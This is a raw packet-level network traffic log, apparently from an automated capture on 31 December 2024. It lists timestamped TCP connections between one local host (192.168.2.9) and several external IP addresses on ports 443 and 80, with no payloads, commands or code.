Dec 31, 2024 15:02:22.361488104 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:22.361562014 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:22.368760109 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:22.368798018 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:22.368856907 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:22.369621992 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:22.369658947 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:22.369716883 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:22.378051043 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:22.378070116 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:22.378365993 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:22.378385067 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:22.378407955 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:22.378432989 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:22.842581987 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:22.842658997 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:22.847187996 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:22.847203016 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:22.847465992 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:22.888900042 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:22.924395084 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:22.967345953 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:23.020188093 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.020915985 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.020927906 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.021528006 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.022574902 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:23.022639990 CET	443	49706	188.114.97.3	192.168.2.9
Dec 31, 2024 15:02:23.023641109 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:23.024082899 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.024091005 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.024369001 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.025731087 CET	49706	443	192.168.2.9	188.114.97.3
Dec 31, 2024 15:02:23.026170969 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.032967091 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.033056021 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.033068895 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.033715010 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.034723043 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.034728050 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.034977913 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.036422014 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.038597107 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.038630009 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.038923025 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.039155960 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.039172888 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.071331978 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.083328009 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.502862930 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.503022909 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.505903959 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.505914927 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.506328106 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.507939100 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.555325985 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.567858934 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.567940950 CET	443	49708	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.568238020 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.625176907 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.625252962 CET	443	49707	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:23.625938892 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.627720118 CET	49707	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.628190994 CET	49708	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:23.725111008 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.725162029 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.725193977 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.725224972 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.725258112 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.725280046 CET	443	49709	104.21.85.189	192.168.2.9
Dec 31, 2024 15:02:23.727766037 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:23.744560957 CET	49709	443	192.168.2.9	104.21.85.189
Dec 31, 2024 15:02:24.053952932 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.053991079 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.054088116 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.054630041 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.054642916 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.090228081 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.090292931 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.090357065 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.090678930 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.090693951 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.713409901 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.713556051 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.713565111 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.713618040 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.715044022 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.715050936 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.715298891 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.717015982 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.734484911 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.734563112 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.734581947 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.734635115 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.736458063 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.736464977 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.736745119 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.738147020 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:24.759337902 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:24.783334970 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.265511036 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.265579939 CET	443	49710	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.265708923 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.279046059 CET	49710	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.321566105 CET	49712	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.321623087 CET	443	49712	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.321682930 CET	49712	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.321928978 CET	49712	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.321959019 CET	443	49712	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.348752022 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.348824978 CET	443	49711	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.348926067 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.349217892 CET	49711	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.478187084 CET	49713	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.478234053 CET	443	49713	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.478296995 CET	49713	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.479022026 CET	49713	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.479037046 CET	443	49713	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.955136061 CET	443	49712	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:25.965958118 CET	49712	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:25.965991974 CET	443	49712	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.132622957 CET	443	49713	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.134562969 CET	49713	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:26.134593964 CET	443	49713	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.535948038 CET	443	49712	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.536019087 CET	443	49712	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.536128998 CET	49712	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:26.541188955 CET	49712	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:26.643691063 CET	49714	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:26.643744946 CET	443	49714	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.643810987 CET	49714	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:26.644037008 CET	49714	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:26.644054890 CET	443	49714	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.676398039 CET	443	49713	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.676462889 CET	443	49713	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:26.676598072 CET	49713	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:26.697495937 CET	49713	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:27.278419018 CET	443	49714	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:27.280185938 CET	49714	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:27.280210018 CET	443	49714	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:27.856622934 CET	443	49714	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:27.856695890 CET	443	49714	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:27.856751919 CET	49714	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:27.857142925 CET	49714	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:27.875154018 CET	49715	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:27.875211954 CET	443	49715	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:27.875283957 CET	49715	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:27.875593901 CET	49715	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:27.875607014 CET	443	49715	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:28.513773918 CET	443	49715	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:28.515724897 CET	49715	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:28.515758038 CET	443	49715	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:28.642716885 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:28.642771006 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:28.642879009 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:28.645795107 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:28.645819902 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:28.649794102 CET	49715	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:28.649887085 CET	443	49715	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:28.650024891 CET	49715	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:28.713100910 CET	49717	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:28.713126898 CET	443	49717	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:28.713268042 CET	49717	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:28.713748932 CET	49717	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:28.713768005 CET	443	49717	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.102447033 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:29.102526903 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:29.104882956 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:29.104892015 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:29.105129004 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:29.106611013 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:29.151341915 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:29.228643894 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:29.228728056 CET	443	49716	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:29.228777885 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:29.229187012 CET	49716	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:29.233721018 CET	49717	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.239759922 CET	49718	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:29.244600058 CET	80	49718	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:29.244705915 CET	49718	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:29.244919062 CET	49718	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:29.249691963 CET	80	49718	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:29.255944014 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.255970955 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.256056070 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.256336927 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.256354094 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.279335976 CET	443	49717	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.367242098 CET	443	49717	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.367304087 CET	49717	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.367321968 CET	49717	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.720521927 CET	80	49718	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:29.764189005 CET	49718	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:29.886936903 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.887031078 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.887048960 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.887142897 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.888843060 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.888848066 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.889096022 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:29.890631914 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:29.935331106 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:30.716295004 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:30.716371059 CET	443	49719	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:30.716495991 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:30.717792988 CET	49719	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:30.728477955 CET	49718	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:30.733498096 CET	80	49718	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:30.733606100 CET	49718	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:30.738432884 CET	49720	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:30.738476992 CET	443	49720	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:30.738626957 CET	49720	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:30.738790035 CET	49720	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:30.738810062 CET	443	49720	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:31.376120090 CET	443	49720	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:31.377887011 CET	49720	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:31.377909899 CET	443	49720	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:31.963135958 CET	443	49720	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:31.963208914 CET	443	49720	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:31.963273048 CET	49720	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:31.963782072 CET	49720	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:31.978751898 CET	49721	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:31.978806019 CET	443	49721	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:31.978923082 CET	49721	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:31.979202032 CET	49721	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:31.979216099 CET	443	49721	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:32.617245913 CET	443	49721	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:32.618953943 CET	49721	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:32.618968010 CET	443	49721	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:33.195673943 CET	443	49721	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:33.195765972 CET	443	49721	162.125.66.15	192.168.2.9
Dec 31, 2024 15:02:33.196820974 CET	49721	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:33.197393894 CET	49721	443	192.168.2.9	162.125.66.15
Dec 31, 2024 15:02:33.206615925 CET	49722	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:33.211473942 CET	80	49722	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:33.211555958 CET	49722	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:33.211905956 CET	49722	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:33.216665030 CET	80	49722	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:33.739288092 CET	80	49722	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:33.757302999 CET	49723	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:33.757337093 CET	443	49723	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:33.757419109 CET	49723	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:33.757711887 CET	49723	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:33.757728100 CET	443	49723	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:33.779582024 CET	49722	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:34.237556934 CET	443	49723	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:34.239526987 CET	49723	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:34.239547014 CET	443	49723	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:34.391277075 CET	443	49723	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:34.391364098 CET	443	49723	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:34.391437054 CET	49723	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:34.392178059 CET	49723	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:34.392371893 CET	49722	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:34.393116951 CET	49724	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:34.397305965 CET	80	49722	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:34.397375107 CET	49722	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:34.397953987 CET	80	49724	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:34.398025036 CET	49724	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:34.398140907 CET	49724	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:34.402870893 CET	80	49724	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:34.916517019 CET	80	49724	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:34.967076063 CET	49724	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:35.333808899 CET	49725	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:35.338677883 CET	80	49725	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:35.338901043 CET	49725	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:35.339112997 CET	49725	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:35.343929052 CET	80	49725	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:35.858038902 CET	80	49725	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:35.859357119 CET	49726	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:35.859385967 CET	443	49726	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:35.859481096 CET	49726	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:35.859770060 CET	49726	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:35.859781981 CET	443	49726	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:35.898493052 CET	49725	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:36.312393904 CET	443	49726	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:36.314234972 CET	49726	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:36.314248085 CET	443	49726	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:36.445753098 CET	443	49726	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:36.445832014 CET	443	49726	104.26.12.205	192.168.2.9
Dec 31, 2024 15:02:36.445903063 CET	49726	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:36.446508884 CET	49726	443	192.168.2.9	104.26.12.205
Dec 31, 2024 15:02:36.465662956 CET	49725	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:36.470695972 CET	80	49725	208.95.112.1	192.168.2.9
Dec 31, 2024 15:02:36.470772028 CET	49725	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:36.473500013 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:36.473531961 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:36.473777056 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:36.474150896 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:36.474163055 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.093319893 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.093441963 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.095572948 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.095603943 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.095884085 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.097791910 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.097842932 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.391189098 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.391999960 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392045021 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392165899 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392182112 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392195940 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392206907 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392288923 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392328024 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392658949 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392693043 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392697096 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392714977 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392880917 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392895937 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392947912 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.392956972 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.392992020 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393006086 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393075943 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393085957 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393182039 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393193007 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393285990 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393296957 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393311024 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393332005 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393409014 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393426895 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393438101 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393448114 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393496990 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393511057 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393518925 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393524885 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393546104 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393558025 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393568039 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393578053 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393584967 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393589020 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393623114 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393639088 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.393672943 CET	49727	443	192.168.2.9	149.154.167.220
